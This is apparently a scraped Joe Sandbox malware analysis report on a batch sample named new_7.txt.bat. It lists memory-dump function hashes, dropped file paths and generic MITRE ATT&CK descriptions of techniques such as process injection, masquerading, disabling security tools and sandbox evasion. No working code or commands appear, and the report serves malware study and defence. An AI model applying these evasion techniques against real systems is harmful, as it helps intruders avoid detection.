Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a134b3ab959940b17b566cd22df3e6e56d4e13c7541c8a67a9a0fbb03377724
Instruction ID: e69a6c2f3fd94dd4767551db7ef5235d7bf9b17e22163097a411d29db4a4bc80
Opcode Fuzzy Hash: 1a134b3ab959940b17b566cd22df3e6e56d4e13c7541c8a67a9a0fbb03377724
Instruction Fuzzy Hash: 2801A73111CB0C8FD744EF4CE091AB6B3E0FB85360F10052DE58AC3651DA36E881CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC27B8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ff565432de1655604ed004ec9522ca9c56564085d39d260f9ef7cd9e5fb312
Instruction ID: 4ad0353c0575853a902d3f5626def2cfcd8dfe860f9aff990b920a346a6db78f
Opcode Fuzzy Hash: 83ff565432de1655604ed004ec9522ca9c56564085d39d260f9ef7cd9e5fb312
Instruction Fuzzy Hash: E9F0373275C6048FDB5CAA1CF8829B573D1E795320B00056EE48BC3696D927E8428685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814BC2774 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348578526.00007FF814BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814bc0000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cced08b9c58f05b8f67811a4e161a2c53c0f48cf2fb80fa25ea2cf3fe4d0b25
Instruction ID: 80840fd97c7631134e6dd1a64bda5aa39e109d5e284bf0772ee247871dce8b1c
Opcode Fuzzy Hash: 7cced08b9c58f05b8f67811a4e161a2c53c0f48cf2fb80fa25ea2cf3fe4d0b25
Instruction Fuzzy Hash: 93F0303275C6084FDB4CAA1CF8829B573D1E799324B00016EE48BC2656D926E8838685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C931DD Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73e89512b10ffdca369000d82c9341baff83b8f27ae8c42cc43dd35f7fad298
Instruction ID: 19cde03f83aa1d023794ea6710dd7ee8460f34f5f92d942066319e8a837c26d2
Opcode Fuzzy Hash: c73e89512b10ffdca369000d82c9341baff83b8f27ae8c42cc43dd35f7fad298
Instruction Fuzzy Hash: 77E06532B1C9084F9F54FB6CD8599E9B7E1EB58321B1401BBE00AD3252DE24A8948794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C90296 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db469584c8d97cb54d7439e2dcac940c88518bfc61f711e0d8d897e0f0a5a7b6
Instruction ID: e83307b3ff51c0c749c56181e0db3e23acb279a86c8cf542876963d18e73411b
Opcode Fuzzy Hash: db469584c8d97cb54d7439e2dcac940c88518bfc61f711e0d8d897e0f0a5a7b6
Instruction Fuzzy Hash: 2CE08663E1DE2E5AF7A4A15D68563F4A2C1EB566B574503B3D40CD3682ED156C100285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF814C91006 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.348791572.00007FF814C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814C90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff814c90000_new_7.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 871c61da80183d3b1e2f9a6f18f3066f882539f5e33187541730b3d30c551161
Instruction ID: 59c5ac1c2eb1dc6cde6f9ec931dc0ac76dab42bc38ce673c0df8ccc9701302ed
Opcode Fuzzy Hash: 871c61da80183d3b1e2f9a6f18f3066f882539f5e33187541730b3d30c551161
Instruction Fuzzy Hash: 6FE02673E1CCBD6BF3A0E11C28462F492C0EB856B0B0412B7D40CD3182EC06AC1443C1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report new_7.txt.bat

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\new_7.txt.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ep0nkokm.njz.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_je3w0lz2.ags.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jj3z4vfm.ghc.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t0t53sw2.il2.ps1

C:\Users\user\Desktop\new_7.txt.bat.exe

Static File Info

General

File Icon

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: cmd.exePID: 6068, Parent PID: 3528

General

File Activities

File Opened

File Created

File Read

File Attributes Queried

Windows Analysis Report
new_7.txt.bat